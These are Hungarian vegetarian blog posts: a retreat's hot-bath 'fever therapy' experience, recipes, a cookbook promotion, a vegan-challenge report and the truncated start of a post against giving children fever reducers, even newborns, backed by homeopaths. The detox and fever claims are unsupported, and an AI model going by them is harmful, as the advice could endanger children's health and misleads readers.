ezt a végzetesnek tűnő betegséget. Elszorul a szívem, ha az állapotára gondolok. Milyen jó lenne, ha még jó néhány évet egészségben élhetne...! Róla még szándékozom írni a későbbiekben (más bejegyzésben), de most visszakanyarodok a kezelésekhez. Konkrétan a lázterápiához. Férjem második napunkon részesült lázterápiában. 38,4-ig ment fel a láza, tovább nem. Ezen a hőmérsékleten tartották egy ideig, majd a szokásos langyos, vagy hideg vizes lemosás, ágyban fekvés, izzadás következett. Jól bírta, ahhoz képest is, hogy elsőnek kapott profi lázterápiát. Én az utolsó kezelési napomon részesültem benne. Tavaly 38,7 -re elég gyorsan felszökött a lázam, s gondoltam, ez most is talán így lesz. Hiába szálltam be a 43 fokos vízbe, valahogy csak 38-ig jutott feljebb a lázam. Majd újra és újra engedtünk még jó meleg vizet a kádba. (Rajongok a forró vizes fürdőért télen és nyáron egyaránt!) Így végül eljutottunk a tavalyi 38,7 magasságig. Ott tartottuk kb. 20-30 percig, majd vízleengedés, hidegebb zuhany, kiszállás, bebugyolálás, felmenetel volt a terv. Ahogy azonban szép lassan kiszálltam a kádból (tavaly nagyon kis virgonc voltam, sokkal könnyebben ment az egész), éreztem, hogy vagy leülök, vagy elszédülök. Szóltam, s szerencsére karnyújtásra volt a kezelőszobában a masszázságy, így oda ültem, majd feküdtem. Ekkor már férjem is bekukucskált, és fekvő helyzetemben megemelte a lábam, míg kezelőm is próbált segíteni, vizet adni, hideg borogatást adni, stb. Ahhoz képest, hogy tavaly milyen könnyedén eljutottam a szobámba, most úgy 10-15 percet csak feküdtem a masszázságyon, hogy magamhoz térjek. Sikerült. Így miután szobámba mentünk, melegbe bugyolálva ágyfekvés következett, úgy fél órán keresztül. Folyt rólam a víz az ágyban. Kaptam is utánpótlást. Szívószállal szürcsöltem a vizet.:) Tavaly egészen máshogy élten meg a lázterápiát. Könnyedebben. Ennek ellenére most is nagyon örültem neki és élveztem. Külön tetszett, hogy az előkészített ágyban folyt minden testrészemen rólam a víz. Méregtelenítettem. Nem tudom, ennek köszönhetem-e, de az elmúlt téli időszakban bizony kimaradt az, hogy egy hétre lerobbanjak és nagyon belázasodjam. Ugyan el-el csíptem kisebb megfázást, de igazából a szokotthoz képest gyorsabb leforgással és könnyebben átment rajtam.
Megjelent - és a blog olvasóinak akciósan megvásárolható és a vásárlással ajándékcsomag nyerhető!
2013. július 23. Mindennapi ételeink
A Főzés gyerekjáték című könyvünk hiánypótló alkotás a mai magyar könyvpiacon: nem íródott még vegetáriánus, vegán gyermekszakácskönyv . A színes, exkluzív kiadvány több mint 85, laktózmentes receptet tartalmaz, melyeknek egy része gluténérzékenyek számára is fogyasztható. A könyv a gyermekeknek íródott, de az egész családot főzésre hívja. Egészségtippjei, természetvédő, zöld tanácsai és kreatív ötletei hasznosak lehetnek mindenki számára. A receptek 3 nehézségi fokban íródtak, így 5 éves kortól felnőtt korig ajánljuk. Itt lehet belelapozni a könyvbe. Két jó hírem is van a blogra hivatkozó megrendelőknek: 1. aki a blogra hivatkozva rendeli meg, 2350 Ft-os, akciós áron juthat hozzá (megrendelés: szerkesztoseg@nyitottszemmel.hu) 2. az első 100 megrendelő között egy finomságokkal teli ajándékcsomagot sorsolunk ki. Az ajándékcsomag támogatói: Alpro, Pithari olívaolaj, Vegetár Kft,
Egy éve.... Eleken
Elmúlt 365 nap, és még mindig az emlékeimben fontos helyen él az egy évvel ezelőtt Eleken eltöltött időszak. Azóta több-kevesebb sikerrel igyekszem megvalósítani azokat az életmód-elveket, amelyeket ott megtanultam, elméletben elsajátítottam. Már előtte is sokszor hallottam - egészen iskolás koromtól kezdve, és próbáltam Elek előtt is megélni azt, hogy folyadékot étkezés előtt legalább fél órával kell fogyasztani, étkezést követően pedig jó, ha várunk 1 órát, mielőtt innánk. Szintén tudtam, hogy a legjobb folyadék a test számára a víz, a tiszta víz. S persze az sem mindegy, hogy mennyit iszunk. A napi minimum 2 liter víz szintén az egészség megőrzésében fontos szerepet kap. Az elmúlt egy évben sikerült a saját háztartásomból teljesen kiiktatni a tojást, ami legutoljára maradt meg az "állati eredetű" ételeket tekintve. (Jó, még méz van otthon, azt nem is szándékozom száműzni, de szerintem egészen más kategória.) A tojás és tejföl kapcsán meg kell említenem, hogy nincs semmifajta belső kényszerem, pláne nem lelkiismeret-furdalásom akkor, ha vendégségben vagyok, és tojás, ill. esetleg tejföl alapú ételt készítenek. Úgy gondolom nem helyes hozzáállás az, ha a mások által szeretettel készített (amúgy vegetáriánus) ételt azért nem fogyasztanám el, mert tojás vagy tejfölt tartalmaz. Persze, mielőtt megyünk valahova, igyekszünk ezt, de legalább azt, hogy vegetáriánusok vagyunk jelezni mások felé. Sokan ugyanis azt sem tudják, mi fán terem a vegán életmód. Az emberek vendégszeretetével ily módon nem szeretnénk (férjemmel együtt) visszaélni, másoknak nehézséget okozni. Bár irigylem ugyanakkor azokat, akik még teljesebb vegán életet tudnak élni. Törekszünk mi is, és a fejlődés lépésről lépésre történik. Minden mások általi törekvést - vagyis az étkezési igényünk kedvében járni - kedvesnek és intelligensnek tartok irányunkba. Táplálkozáshoz kötődő változás az, hogy igyekszem egyre több nyers táplálékot magamhoz venni. Igen, ez nehezebb volt télen (jégsaláta, répa és alma volt a "sztár"), de amióta ismét magyar földeken érik a zöldség és a gyümölcs, azóta ez könnyebben megvalósítható. Már Elek előtt is nekikezdtem a rendszeres testmozgásnak, ami ugyan a tél fagyos zimankójában alábbhagyott valamivel, de február vége óta ismét sikerül hetente időt szakítanom legalább 2 alkalommal az intenzív mozgásra. Emellett a 7 napból 5-6 nap igyekszem 20-30 perces gyaloglást is a napi menetbe iktatnom. Ami a napfényt illeti. Egész életemben szerettem a meleget, a napsütést, így igazából túl sok tudatos változtatásra ezen a téren nem volt szükségem. Inkább a Napnak kéne tudatosabban sütnie.:) Úgy értem, hogy megfelelő napozási körülményeket tekintve.:) Ha az intenzív fizikai mozgást nem is nagyon folytattam a téli időszakban, a rendszeres napi gyaloglást igyekeztem megvalósítani kb. kétnaponként. Ekkor pedig friss levegőben volt részem. S ahogy a napozáshoz nem kell semmi plusz motiváció, úgy a friss levegőn tartózkodás is csak télen nehezebb, addig amíg elindulok. Nagyjából ezek a fizikai dolgok tekintetében meglépett változások, amelyek jó hatással vannak szervezetemre. Elsőnek meg kell említenem azt a tényt, hogy a korábban szinte állandósult derékfájásom a sérv és az életmód (ülőmunka, kevés mozgás, öröklött betegség) következtében hatalmasat fejlődött. Elek előtt nem emlékszem olyan napra, hogy ne fájt volna a derekam. Pedig kipróbáltam gyógytornát, úszást, masszázst, de igazán hathatós segítségnek egyik sem volt mondható. Viszont az Eleken kapott kezelések szinte csodával határos módon a fájdalmaim 90%-át eltüntették. Persze azóta a mozgásszegény életmódom is átalakult. De régen épp azért nem tudtam mozogni, mert derékfájás miatt nem esett igazán könnyedén a mozgás. Ma már ez elég szépen a múlté. Nem mondom, hogy teljesen minden eltűnt, de minőségileg sokkal jobb napokat, heteket élek. Bejegyzésem végén pedig a tavaly Eleken eltöltött napok beszámolóit ajánlom minden kedves olvasómnak: 1. rész - Bevezetés, megérkezés, 1. nap 2. rész - Az első igazi böjt 3. rész - Gőzpakolás és a rostban gazdag kétszeri étkezés tapasztalata 4. rész - Reggeli, ebéd, és hol a vacsora? 5. rész - A kezelő(m) dicsérete 6. rész - Gabona és gyümölcs, egy pánikbeteg gyógyul 7. rész - Gyümölcshiány, úszás, vastagbélrákból meggyógyulás tapasztalata 8. rész - A "kolitiszes" páciens 9. rész - A lázterápia élménye 10. rész - Böjtölök, az asztmából gyógyuló, gerincferdülésből fejlődő fiú esete 11. rész - kozmetikai kezelés zárásként Remélem, minden kedves olvasó talált benne érdekes, hasznos leírást.
Káposztás árpa pikáns, magyaros szósszal
Káposzta, káposzta, minden formában Imádom!!! Hozzávalók: 1/2 édes káposzta 1 diónyi kókuszzsír 1 tk tiszta só A káposztát a robotgéppel apróra szeleteltem, besóztam, és picit hagytam állni. Kicsavartam a levét, és rádobtam a lábosban olvadozó kókuszzsírra. Takarék lángon kb. 1/2 óra alatt megpirult Gabona: 1 maréknyi főtt árpás barnarizs 1 tk tiszta só 1 bélyegnyi […]
Esti saláta
Végre elérhető áron és minőségi ízben lehet hozzájutni a magyar zöldségekhez is. Szeretem ezt az időszakot, mert nagyon sok salátát lehet fogyasztani (és persze zöld turmixot, amikről hamarosan ismét blogolok). Salátát lehet enni reggel, délben, este, mindenesetre segít az embernek kitisztítani a mérgeket a testéből, a rostok átmossák az emésztőszerveket, csökkentik a koleszterinszintet, jótékony hatással bírnak a vércukor szintre is (ugyanis nem ingadozik tőle a vércukorszint). Bátran ajánlom minden földi halandónak:) éljen vele mindenféle zöldségek variációjában akár minden nap. Meghálálja szervezetünk. A recept: Hozzávalók: 1/3 fej lolo saláta - 3 paradicsom - 1-2 pritamin paprika - 2-3 uborka - 1 evőkanál hidegen sajtolt olaj (oliva) - 1 teáskanál szezámmag - 1 evőkanál napraforgómag - 1 lilahagyma (opcionális) Elkészítés: A megmosott zöldségeket feldaraboljuk. A lolo saláta leveleit széttépkedjük. Az uborkát megpucoljuk (nem muszáj) és vékony karikákra vágjuk vagy reszeljük. Mindezt egy szép nagy tálba tesszük. Rászórjuk a magokat, meghintjük olajjal. Salátaszedő kanalakkal átkeverjük és már fogyasztható is a finom, egészséges saláta! Én teljesen jóllaktam vele.Ilyen salátát ettünk az előző bejegyzésemben leírt szószos tésztához.
Babtrió leves
Bizonyára kevesen tudják, hogy a bab tényleg ősi eledelnek számít. Ugyan a kukorica történetéről írva korábban már említést tettem a babról is, miszerint már Kolumbusz felfedezése előtt is mexikói földeken a kukoricaszárra futtatták fel a babot. A kukoricánál azt írom, hogy kb. 4,5 ezer éve ismert az emberiség számára. Ami a babot illeti, írásos nyomait a Bibliában is felfedezhetjük. Első helyen Dávid király történetei között bújik meg a "bab" szócska. "Ágyneműt, medenczéket és cserépedényeket, búzát, árpát, lisztet, pergelt búzát, babot, lencsét, pergelt árpát, mézet, vajat, juhot, ünősajtokat hozának Dávidnak és az ő vele való népnek eleségül. Mert azt gondolják vala magokban: A nép éhes, fáradt és eltikkadt a pusztában." - Olvasható Sámuel II. könyve 17. fejezetének végén, amikor Dávid Absolon elől menekült. Ezt követően pedig Ezékiel próféta említi a babot a 4. fejezetében: "És végy magadnak búzát és árpát és babot és lencsét és kölest és tönkölyt, és tedd ezeket egy edénybe, és ezekből csinálj magadnak kenyeret; a napok száma szerint, a míg oldaladon fekszel, háromszázkilenczven napon egyed azt." Dávid király ie. 1010-970 között uralkodott, Ezékiel próféta pedig ie. 623-571-ig élt. Tehát kimondhatjuk, hogy a babról is van több ezer éves írásos emlékünk. Ebből is kitűnik, hogy a hüvelyeseket is emberi fogyasztásra szánta az Isten. (Ellenben lsd: paleolit táplálkozás.) A recept: Hozzávalók: - 25 dkg vesebab - 10 dkg cseresznyebab - 25 dkg színes virágbab - 10 szál sárgarépa - 4 szál fehérrépa - 5 szem krumpli - 1 karalábé - petrezselyem - 6-8 gerezd fokhagyma - ételízesítő - babérlevél (6-8 levél) - só Elkészítés: Miután a babokat fajtájuk szerint külön edényekben órákon át áztattuk (én kb. 24 órát, háromszor vizet cserélve, de 8 óra is elég), sós, babérleveles vízben feltesszük őket főzni (együtt). Amikor a babszemek már roppanósra puhultak, a vizet, amiben főtt - szűrő segítségével - leöntjük. A babérleveleket kiszedjük a bab közül. Azért szoktam vizet cserélni, hogy ne okozzon puffadást a leves. A leszűrt léből kb. 1 liternyit megtartunk. A babokhoz hozzáadjuk a megtisztított, felkarikázott répákat, a felkockázott karalábét és krumplikat. Átkeverjük tűz felett. Adunk hozzá egy kis ételízesítőt (nekem házi van), és felöntjük vízzel úgy, hogy bőségesen ellepje. Akik a magyaros ízeket preferálják, fűszerpaprikát szórhatnak még bele, jelenleg ezt kihagytam. Közepes lángon tovább főzzük addig, amíg a zöldségek meg nem főnek. A főzés befejezése előtt kb. 10 perccel hozzáadjuk a fokhagymadarabokat és az apróra vágott petrezselyemzöldet. Tésztát is főzhetünk hozzá. De most tészta nélkül is elég sűrűre sikeredett. Az utolsó 10 percben akár gabonakolbász szeleteket is tehetünk hozzá. A leves olaj nélkül egészségesebb, ezért nem került bele semmi rántás. Így lágyabb az íze, de a fűszerek (fokhagyma, petrezselyem) miatt mégis ízletes.
Betett a hosszú tél a magyar paprikának és paradicsomnak is
A hosszúra nyúlt tél nagyobb fűtési és világítási költséggel járt a paprika- és paradicsomtermelőknek, és a kedvezőtlen körülmények a növények számára sem biztosították az optimális feltételeket.
Boldog Születésnapot Nekünk!
2013. május 4. Vegetáriánus receptek
Torta helyett articsóka. Főzzünk belőle valamit! De mit? Keressünk egy jó receptet a Vegetáriánus Recepteken! ;-)
Napra pontosan 1 éve indítottuk el portálunkat. Örülünk. Mozgalmas év van mögöttünk. Tartalmakban és szolgáltatásokban egyaránt folyamatosan bővült oldalunk, úgy érezzük, sikerült hozzátennünk a magyar vegetáriánus színtérhez.
Rengeteg tervvel, határozott arcéllel, messzire tekintünk a zöldséges jövőbe!
Köszönjük az észrevételeket, a támogatást és a bíztatást, a lájkokat és a megosztásokat.
Puszi, pacsi, kinek mi!
Bliszkó Viktor
Mitől hullanak a magyar méhek?
Nem teljesen világosak a világméretű méhpusztulás okai, de az újfajta növényvédőszerek is felelőssé tehetők érte. Magyarország továbbra is szeretné alkalmazni ezeket a szereket, a méhészek a gyártók és a forgalmazók felelősségét pedzegetik, a Greenpeace viszont a betiltásuk mellett kampányol.
30 nap tapasztalatai a 30 NAPOS VEGÁN KIHÍVÁS UTÁN
Némiképp megkésve, de azért végre eljutottam oda, hogy összefoglaljam az eltelt 1 hónap tapasztalatait...:-) Amikor február végén megfogalmazódott bennem a gondolat, hogy megcsinálom, egyáltalán nem gondoltam, hogy ilyen nagy visszhangja lesz a kezdeményezésnek...:-) Egy hét alatt 800-an csatlakoztak a Facebook oldalhoz, és 150-en jelezték, hogy belevágnak! Ez azért is volt nagyon meglepő számomra, mert amikor több, mint 20 évvel ezelőtt elkezdtem a vegetáriánus étkezést, még nagyon sok évig általában nem volt tanácsos nagyon reklámozni, hogy így étkezik az ember... Úgy tűnik, végre sokat változott a világ, és Magyarország is a témában, szerencsére elfogadóbbak, nyitottabbak lettek talán az emberek... És egyre többen keresik az egészséghez, a fizikai jól-léthez, jó közérzethez vezető utat! Ami pedig különösen megérintett, hogy nagyon sokan voltak a jelentkezők közül, akik előtte még sosem próbálták a vegetáriánus étkezést, és előtte húsevőként vágtak bele! Emelem kalapom előttük is!! NAGYON KÖSZÖNÖM ÉS RENDKÍVÜL HÁLÁS VAGYOK MINDENKINEK, AKI VELEM TARTOTT EBBEN A NAGY KALANDBAN!:-) Bízom benne, hogy minél többet sikerült megtapasztalni a vegán étkezés előnyeiből és új tapasztalatokkal gazdagodtatok az önmegismerés útján is!:-) És nem utolsó sorban megemlítve azt az óriási előnyt, hogy mennyi állati eredetű élelmiszer, és mennyi állat nem került elfogyasztásra ezen időszak alatt....!!! És közösen hozzájárultunk, még ha piciben is most, a Föld jobb létéhez!! Megpróbálom összefoglalni a saját személyes tapasztalataimat, de nagyon megköszönöm, ha mindenki más is, aki részt vett a programban, megosztja mi változott benne, körülötte ez idő alatt, mert sokat segíthetünk így másoknak is! Mik voltak a személyes céljaim a programmal? - szerettem volna visszatérni a vegán, és ugyanakkor TUDATOSan egészséges, és NEM puding (azaz nem összevissza evős, csak a húst kerülő)-vegetáriánus étkezéshez; - le akartam tesztelni, és leginkább fejleszteni azt, hogyan tudom összeegyeztetni, hogy két félét főzök, azaz magamnak és a családnak is külön; - fogyni szerettem volna kb. 4 kg-t; - az adalékok, a cukor és a fehér liszt teljes mellőzésével némileg tisztítókúrát is adni a testemnek:-); - beépíteni a rendszeres cardio mozgást az életembe. Mit sikerült megvalósítani a célokból? - a visszatérés a vegán étkezéshez abszolút nem volt nehéz számomra (volt már olyan 5 év, amikor úgy étkeztem, és tojást nem, tejterméket amúgy is ritkán fogyasztottam), és megtapasztaltam, hogy tudatos tervezéssel, igen is lehet gyorsan és finomakat főzni!:-) - a családi két felé főzés azért annyira nem realizálódott sajnos...:-( Ebben a hónapban bizony a család volt az, és nem én, aki több félkészet evett...:-/ A férjem szerencsére beszállt a reggelikbe-vacsorákba, így ő legalább velem tartott az étkezésben, de a gyerekek mivel nagyon korlátozottan fogyasztják sajnos a zöldségeket-gyümölcsöket, elég ritkán volt megvalósítható, hogy az egyik fajta hozzávalóból, kis módosítással nekik is csináljak valamit... Ezen a területen sokat kell még fejlődnöm, úgy érzem... - fogytam 3 kg-t, a derékbőségben -4 cm, a csípőben viszont csak alig -2 cm, úgyhogy előre tovább az úton!:-)) - a fehér liszt, cukor, adalékok elhagyása egyáltalán nem volt nehéz... - a saját mozgás terén is ugyancsak van még mit fejlődni...:-) A napi 20 perc mozgás heti legalább 4 nap megvolt (illetve én heti több nap tartok CANTIENICA(R) -órákat is, amikor azért tornázom is mindig kicsit), de a cardio bevetése elmaradt a tervezettől... Általában heti 1 sikerült csak... :/ Ebben is van még mit fejlődni!! Mit hozott nekem a kihívás személy szerint? A nagyobbik gyermekem lassan 8 éves, és amióta ők megszülettek, nagyon sokat koncentráltam az ő étkezésükre... Noha ezt a blogot is írtam, sokszor futottam azért bele félresikerült vegás ételekbe. Az elkeseredettség és frusztráció amiatt, hogy már a főzés megkezdésekor tudtam, a zöldség-gyümölcs nem túl nagy sikert fog náluk aratni, és nem az ő szájízük szerint főzök, sokszor vezetett további félresikerült ételekhez. Egy idő után nagyon elment a kedvem, hogy újabb vegás ételekkel próbálkozzak, vagy hogy egyáltalán bármit is főzzek... Ez alkalommal úgy indultam neki a 30 napnak, hogy elengedtem ezt az érzést, elfogadtam, hogy ők úgysem ezt fogják enni, ezen nem érdemes stresszelnem, a férjem és én viszont jókat eszünk majd!:-) És ez a belső átalakulás meg is hozta az eredményét, mert nagyon finomra sikeredtek az ételek, a férjem is megjegyezte, hogy valójában mióta együtt vagyunk (12 éve:-), most főztem a legfinomabb, legízletesebb vegás ételeket...:-))) Na és persze zseniálisan jó az Attila Hildmann: Vegan for Fit könyv is! - a program végére pedig sokkal könnyebbnek éreztem magam, nem vágytam sóvárogva a klasszikusan egészségtelen ételek, édességek után! Beálltam a napi 2-3-szori étkezésre, és azzal nagyon jól elvoltam, ha pedig ettem, amint éppen jól laktam, akarva sem tudtam többet enni! - éhséget alig éreztem az 1 hónap alatt, talán még az első héten 1-2 alkalommal, utána viszont szinte egyáltalán nem! Mi volt a legnehezebb a 30 nap alatt? - felfüggesztettem a kávé ivást az első naptól kezdve, és noha azt gondoltam, ezen könnyen átlendülök, számomra is megdöbbentő volt a kávé hiánya...! Jó 2 hétig állandóan annyira álmos voltam, hogy alig éltem... Reggel-délben-este, egész nap... Próbálkoztam a zöld teával, majd a Matcha shake-kel, de nem hozta meg a várt eredményt... (az Attila Hildmann - féle 30 napos vegán kihívás programja írja a napi min. 1,5 liter zöld tea + 2 Matcha shake fogyasztását, de nálam ez nem vált be... Írok majd róla egy külön bejegyzést!) Bő 2 hét után átlendültem azonban, és egész jól elvoltam. Alapvetően azonban végig sokkal álmosabb voltam, mint szoktam lenni, esténként már 9h-kor is ágyba dőltem... - nagyon megviselt kezdetben, illetve talán végig ez volt a második legnagyobb hiányérzetem, a klasszikus szénhidrátok (kenyér, tészta stb.) igen csökkentett mennyisége. Az 5-8/9. napig voltam a legmélyebb ponton fizikailag... Nagyon legyengültem, többször leesett a vércukrom, ezért az SOS 1-2 evőkanál agave szirup, vagy 3-4 szem aszalt sárgabarack előfordult nálam néhányszor...:-) A 3. héttől viszont átbillentem!:-) - a 3. naptól nagyon rossz volt a szájíz a számban, rendkívül erős fémes ízt éreztem, hiába súroltam eszettül a fogam...:p Igen, tudom, méregtelenített a szervezetem... Sokszor hallottam már a nyelvtisztítás fontosságáról tisztítókúrák idején, de még a gyakorlatban sosem alkalmaztam. Most eljött az ideje, és utána nem is volt már semmi gondom ezzel..:-) Pl. EZEN a linken többet olvashattok a témáról! Hogyan tovább? A kívánt testsúlyom még nem értem el, úgyhogy lazított formában, de megyek tovább!:-) Igyekszem kerülni a fehér cukrot, fehér lisztet, de nem ellenőrzök mindent mániákusan házon kívül...:-) A vegánság marad, de amikor esetleg étteremben, vagy vendégségben eszem, és nem tudom máshogy megoldani, lehet, hogy bekúszik majd valami tejtermékes, de igyekszem mindenhol kerülni, inkább előre rákészülni... A tojásos dolgokat zsigerből nagyon kerülöm... A Kihívás után egy héttel +1 kg visszakúszott, úgyhogy mindenképpen próbálom betartani, hogy 16h után nem eszem gabonaféléket! És főzök továbbra is az Attila Hildmann könyvből, sok recept van még hátra!:-) Lesz második kör?;-) Hááát, tervezem!:-) Úgy május 2. felétől kb.! De addig is, aki kedvet kapott, ITT a blogon megtalál minden infót, étrendet, instrukciót, és receptet az egyéni kivitelezéshez. A Facebook oldal, és természetesen ez a blog is megy tovább, tartjuk a kapcsolatot!:-) És csatlakozhatsz a zárt Facebook csoportunkhoz is, ahol tovább segítjük, támogatjuk egymást! És még egyszer KÖSZÖNÖM - KÖSZÖNÖM- KÖSZÖNÖM!!!:-) (Ez a fotó a Kihívás végén készült rólam, a fotózást a (39.) szülinapomra kaptam elő-ajándékként a családtól.:-) És mivel még sosem tettem fel ide a blogra képet magamról az elmúlt 7 évben, gondoltam, itt az idő, hogy bemutatkozzam :-))
Hamis tepertőkrém
Tepertő vagy töpörtyű? Egyes magyar nyelvet tanítók szerint a töpörtyű alacsony termetű emberek megnevezéseként szolgál. Ezért aztán tepertő a helyes kifejezés. Azonban úgy gondolom, előbb volt töpörtyű, mint étel s az ragadt rá az alacsony egyedekre. Tehát - véleményem szerint - mindegyik helyes. Környezetemben is töpörtyűt mondanak a legtöbben. De nem is ez a lényeg. Hanem az, hogy ismét egy ételre bukkantam, ami hamisítható! (Köszönet érte az egyik fórumtársamnak, aki felhívta rá a figyelmemet.) Amikor először hallottam, jobban mondva olvastam róla, teljesen be lettem sózva, hogy ezt ki kell próbáljam. Még csak nem is azért, mert gyerekkoromban szerettem volna a töpörtyűt. Közömbös volt számomra. Csak arra emlékszem, hogy dédimamáméknál az egyik disznóvágáskor hol és milyen körülmények között készítették. Viszont sokkal nagyobb izgalomba hozott az, hogy a belőle készült krém hamisítható! :) Svindli lennék tőle? Kétlem. :) A recept: Hozzávalók: - 14 dkg szezámmag - 8 dkg lenmag - olívaolaj (hidegen sajtolt, extra szűz az ajánlott) - kókuszzsír - piros fűszerpaprika - őrölt köménymag - só Elkészítés: A szezám felét, vagyis 7 dkg-t megpirítunk olajmentesen lehetőleg teflon vagy kerámia edényben. Amíg pirul, a lenmagot és a szezámmag másik felét megdaráljuk, minél porhanyósabb állagúra. Amikor a szezámmag megpirult, szintén a darálóba tesszük. (Érdemes megvárni, míg kicsit kihűl.) A ledarált magokat összekeverjük és fele-fele arányban olívaolajat és kókuszzsírt teszünk hozzá, valamint ízlés szerint sózzuk, őrölt fűszerpaprikát és őrölt köménymagot keverünk hozzá. Ha nincs otthon kókuszzsír, készíthetjük csak olívaolajjal, de a hűtőben a kókuszzsíros változat jobban megdermed. Oké, belátom, már nem emlékszem, mikor ettem utoljára töpörtyűt, hiszen kb. 10-12 éves lehettem, amikor az egész család felhagyott bizonyos húsok fogyasztásával. Azonban férjem szerint is tepertőkrémhez hasonló íze lett. Azért is jó kis pástétom ez a hamis töpörtyűkrém, mert az íze miatt ugyan eteti magát, de tulajdonképpen gazdag olajforrás is, ezért érdemes mértéktartónak lenni, nehogy megülje az ember gyomrát.
Rakott édesburgonya
2013. március 20. Gitta nyersétel blogja
Rakott batáta nyresenBatáta vagy édesburgonya... hazánkban kevéssé ismert, pedig trópusi eredete ellenére itthon is termesztik. Eredeti neve batáta, mi édesburgonyának hívjuk, pedig semmiféle rokonságban nem áll a krumplifélék családjával, és az íze sem hasonlít hozzá. Ásotthalmon és környékén élők már 20 éve foglalkoznak a termesztésével. És mit tud, hogy ennyire népszerű a Dél-Alföldnek a keleti szegletében? Egyrészt különleges az íze, rendkívül egészséges, tápanyag összetétele kiváló, és számtalan formában elkészíthető. Magas C vitamin tartalma miatt nem érdemes megfőzni, megsütni :) mert akkor az mind mind elvész... Eddig is fogyasztottam batátát, salátába reszeltem, kinyertem a levét, vagy más zöldségekkel együtt tölteléknek használtam. Ezért is örülök nagyon, hogy nem kell drága pénzen külföldről importálni, hanem hazai termésből is be lehet szerezni. (Erről bővebb info itt: http://bionaturline.hu/batata/index.html) A színe fantasztikus... tele béta-karotinnal... Most jöjjön egy gyors és nagyon finom rakott főétel batátából! Hozzávalók 4 személyre: 50 dkg édesburgonya hámozva 10 dkg vegyes zöld saláta levél 20 dkg dió (beáztatva) 10 dkg napraforgó mag (beáztatva) 1 kisebb fej lilahagyma, 1 kis szál sárgarépa, 1 kisebb darab zellergumó, 1 kápia paprika só, bors, fűszerek Tejföl: 10 dkg kesudió (vagy más olajos mag, pl. kendermag) 1 evőkanál citromlé csipet só kevés víz Az édesburgonyát vékony, gyufaszál vékonyra reszeljük pl. EZZEL A diót és a napraforgó magot lecsöpögtetjük, a zöldségeket mossuk, hámozzuk, kisebb darabokra vágjuk. Mindent beteszünk a konyhai robotgépbe, és morzsásra, kicsit pépesre aprítjuk. Ízesítsük tetszés szerint, én szokásosan magyaros fűszereket használtam, só, bors, egy kis paprika... Vegyünk elő egy kisebb tepsit vagy jénai tálat. Tegyük a reszelt édesburgonyát a tál aljára, majd simítsuk el rajta a töltelék harmadát. Erre ismét batáta reszelék jön, majd ismét a töltelék. Erre tegyünk apróra vágott zöld salátát, és vékonyan ismét töltelék. A legtetejére a maradék batáta csíkok jönnek, amennyi maradt. A tejfölhöz a magokat kevés vízzel sűrű péppé turmixoljuk, ízesítjük sóval, citromlével (esetleg pár csepp stévia, vagy 1 pici fokhagyma gerezd is mehet bele) és a rakott batáta tetejére csurgatjuk. Ha kevesebb menyiséget készítünk, akkor tálalhatjuk rögtön tányéron, ételgyűrűn belül végezzük a rétegezést, és ha készen vagyunk, vegyük le a gyűrűt. Ünnepi ételnek is remek.
Mindennapi kenyerünk, avagy amit az élelmiszerekről eddig nem egészen tudtál...
A film nem csak a húsipar feldolgozásával kapcsolatosan készült, noha az első perc "malacságról" szól. Készítője Nikolaus Geyrhalter negyvenes éveiben járó osztrák filmkészítő, aki 2005-ben készítette az "Unser täglich Brot" című nagyjából másfél órás néma dokumentumfilmjét. Az első képkockák ugyan a disznóhúsokkal indulnak, de ezt követően egy vegetáriánus számára is érdekes témákkal találkozhatunk, úgy, mint "fóliakilométerekben" termesztett paradicsom szüretelése, gépiesített burgonyakitermelés, hirtelen történő paprikaérletetés, kukoricaöntözés (vagy permetezés?), fóliás! almatermesztés, napraforgó és gabona aratás. Ami leginkább rendkívüli volt számomra, az a salátaszüret és csomagolás egy helyben, (most már többet tudok a külföldi jégsalátákról...) és a szintén fóliás uborkaszüret. A legmeglepőbb viszont az olivabogyó-szüret. Erre még nem is gondoltam, amikor olivabogyót vagy olivaolajat fogyasztottam. A film ritka képeihez tartozik a só bányás kifejtése. Nagyon mélyen, a föld sötét zugából érkezik a sókészlet bizonyos része. Számomra az is érdekfeszítő, ahogy a gyönyörű kaliforniai paprikák "készülnek" a fóliával fedett "paprikalugasban", ahol a növények a táplálékot nem igazi földből, hanem valamilyen más úton-módon kapják. Természetesen a képkockák a megdöbbenés mellett egy halomnyi kérdést is felsorakoztatnak a gondolkodó emberben. S még végig sem néztem, de megfogalmazódott bennem a gondolat, milyen szerencsések vagyunk, hogy férjem kedves édesanyja eddig tényleg vegyszermentes, műtrágya-mentes, tiszta, tulajdonképpen bio kertészkedést folytatott a saját kis "konyhakertjében", ahol bőven csurrant-cseppent eddig számunkra finom, ízletes és tényleg egészséges zöldség és gyümölcs. Bizony keveseknek adatik meg ez. Hálásak vagyunk neki keze munkájáért, fáradozásáért. Végül pedig utószóként az sem mellékes, hogy a film elkészítésében magyarok is részt vettek.
Gréta konyhája nőnapon, de nem csak nőknek
2013. március 8. Vegetáriánus receptek
A mai napon, március 8-án, nőnapon jelenik meg országszerte a Gréta konyhája című, 220 oldalas, exkluzív vegán életmód- és szakácskönyv.
- 150 ínycsiklandó és egészséges étel receptje
- rengeteg színes kép
- életmód tanácsok
- bevásárló lista és mintaétrendek
- hús-, tej- és tojásmentesen
Nem csupán recepteskönyv, hanem a vegán életmódot követők, vagy épp az életmódváltók kézikönyve. Tudatos embereknek, fogyókúrázóknak, ínyenceknek és azoknak, akik szeretik a gyors, finom és egészséges ételeket, egyszóval MINDENKINEK!
Az első olyan magyar vegán szakácskönyv, amely Magyarországon elérhető alapanyagokból elkészíthető ételeket tartalmaz.
Bliszkó Viktor
Miért NE CSILLAPÍTSUNK lázat a gyereknek?
Az előző bejegyzésemben már utaltam arra a cikkre, ami alapján 3 évvel ezelőtt mi is elkezdtük a lázcsillapítás elhagyását a gyerekeknél. Azóta egyébként több homeopátiás gyermekorvossal is konzultáltam az ügyben, sőt konkrétan ezt a cikket is megmutattam nekik, és mindannyian egyetértően bólogattak és helyeseltek! Azt gondolom, minél több gyereke, és ezáltal rutinja is van az embernek, annál könnyebben kezeli ezeket a helyzeteket... És bevallom, a Kicsinél azért megvártuk a 3 éves kort, amíg mi úgy éreztük, hogy kellő rátermettséggel tudjuk alkalmazni a módszert a saját gyerekünknél. De van több olyan ismerősöm, akik már újszülött gyermeküknél is ezt alkalmazták! Ha van kérdésetek a témával kapcsolatban, szívesen válaszolok! Szóval, mivel sajnos úgyis aktuális a téma az influenzajárvány miatt, íme a cikk a Házipatika oldaláról: A lázcsillapítási láz csillapításaTények és tévhitek a gyermekkori lázról és lázcsillapításrólSzerző: Dr. 